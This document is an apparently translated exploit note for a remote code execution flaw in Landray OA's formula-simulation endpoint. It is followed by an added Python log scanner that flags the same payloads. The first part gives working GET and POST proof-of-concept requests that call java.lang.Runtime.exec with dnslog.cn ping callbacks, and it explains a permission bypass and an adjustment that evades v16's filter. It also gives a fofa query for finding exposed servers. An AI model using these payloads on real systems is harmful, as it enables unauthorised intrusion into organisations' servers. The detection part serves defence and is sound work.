Login page: white background
### Access FormulaParserByJS and determine the version

On the new version, requesting /admin.do?method=exportModuleVersion returns a blank page; the old version exports the version file instead.

```http
POST /data/sys-common/datajson.js HTTP/1.1
Host: 120.79.1.7
Cookie: SESSION=YjA5MWNkNzUtODU0ZC00NDY0LWJhODItN2JiMzM3Nzg2MTkw; Hm_lvt_4d829b71a81ae4cea109b50ec0d9b4f3=1646928099; Hm_lpvt_4d829b71a81ae4cea109b50ec0d9b4f3=1646928099
Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

s_bean=sysFormulaSimulateByJS&script=var+calc='ping+v16pwned.ozcbbt.dnslog.cn';java.lang.Runtime.getRuntime().exec(calc)&type=1
```
## V15:
/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec("ping%20-c%204%20123.ekn8d3.dnslog.cn")&type=1

## V16:
/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=var+calc='ping+123.jc98e8.dnslog.cn';java.lang.Runtime.getRuntime().exec(calc)&type=1

In fact the v16 PoC works directly on both; they do the same thing. The only difference is that the official new v16 release has some filtering: calling exec("cmd") directly returns a 400 status, so the PoC was adjusted.
Also, the reason for switching to datajson.js is to bypass the permission check, which is rather odd. v15 (https://120.79.1.7:8443); these are all official demo sites. fofa keyword: icon_hash="831854882" && "landray.com.cn"
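For the defensive side of the two PoCs above, here is an added detection example (not part of the original notes and not Landray's code). It classifies requests to the datajson.js endpoint by whether they carry the sysFormulaSimulateByJS bean and a `script` parameter that reaches `java.lang.Runtime`, reading parameters from either the query string or a POST form body since the endpoint accepts both. The log format (combined format with the POST body appended as a final quoted field), the hostnames and the sample lines are all constructed assumptions.

```python
"""Detect abuse of the sysFormulaSimulateByJS endpoint in web-server logs.

Added example, not code from the original notes. Assumes access logs in
combined format with the POST body appended as one extra quoted field
(some reverse proxies and WAFs log it that way); "-" means no body.
"""
import re
from urllib.parse import unquote_plus, urlsplit

TARGET_PATH = "/data/sys-common/datajson.js"
TARGET_BEAN = "sysFormulaSimulateByJS"
# Strings seen in the payloads above; matched after URL decoding, lowercasing
# and whitespace removal so %20 / + / mixed-case variants are treated alike.
SCRIPT_INDICATORS = ("java.lang.runtime", "getruntime", ".exec(")

# Combined log line + trailing quoted body field (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<body>[^"]*)"$'
)


def _parse_form(encoded: str) -> dict:
    """Minimal x-www-form-urlencoded parser: splits on '&' only, so the ';'
    that the PoC scripts contain is never mistaken for a separator."""
    params: dict = {}
    for pair in encoded.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")  # first '=' only; scripts contain '='
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def _normalise(script: str) -> str:
    # Second decode pass catches double-encoded payloads; whitespace removed.
    return "".join(unquote_plus(script).lower().split())


def classify_request(method: str, target: str, body: str = "") -> dict:
    """Verdict for one request: severity none / medium / high plus details."""
    parts = urlsplit(target)
    params = _parse_form(parts.query)
    if method.upper() == "POST" and body:
        for key, vals in _parse_form(body).items():
            params.setdefault(key, []).extend(vals)

    hit_path = parts.path == TARGET_PATH
    hit_bean = TARGET_BEAN in params.get("s_bean", [])
    scripts = [_normalise(s) for s in params.get("script", [])]
    hits = sorted({i for s in scripts for i in SCRIPT_INDICATORS if i in s})

    if hit_path and hit_bean and hits:
        severity = "high"
    elif hit_path and hit_bean:
        severity = "medium"  # formula simulation reached, no Runtime indicators
    else:
        severity = "none"
    return {"severity": severity, "path": hit_path, "bean": hit_bean, "indicators": hits}


def scan_log(text: str) -> list:
    """(ip, method, severity, indicators) for each medium/high request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        body = "" if m["body"] == "-" else m["body"]
        verdict = classify_request(m["method"], m["target"], body)
        if verdict["severity"] != "none":
            findings.append((m["ip"], m["method"], verdict["severity"], verdict["indicators"]))
    return findings


# Constructed sample lines: V15-style GET, V16-style POST, a benign formula
# test, and an unrelated version probe. example.invalid is a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2022:10:01:33 +0800] "GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec(%22ping%20-c%204%20example.invalid%22)&type=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0" "-"
10.0.0.5 - - [10/Mar/2022:10:02:10 +0800] "POST /data/sys-common/datajson.js HTTP/1.1" 400 0 "-" "Mozilla/5.0" "s_bean=sysFormulaSimulateByJS&script=var+calc='ping+example.invalid';java.lang.Runtime.getRuntime().exec(calc)&type=1"
10.0.0.7 - - [10/Mar/2022:10:03:01 +0800] "GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=1%2B1&type=1 HTTP/1.1" 200 3 "-" "Mozilla/5.0" "-"
10.0.0.9 - - [10/Mar/2022:10:04:45 +0800] "GET /admin.do?method=exportModuleVersion HTTP/1.1" 200 0 "-" "Mozilla/5.0" "-"
"""

if __name__ == "__main__":
    for ip, method, severity, hits in scan_log(SAMPLE_LOG):
        print(f"{severity:6} {ip} {method} indicators={hits}")
```

Note that the verdict deliberately ignores the HTTP status: the notes above say the v16 filter answers a direct exec("cmd") with 400, and a blocked attempt is still worth an alert. Requests that reach the formula-simulation bean without Runtime indicators are kept at medium severity so that an unauthenticated caller exercising this endpoint at all is visible.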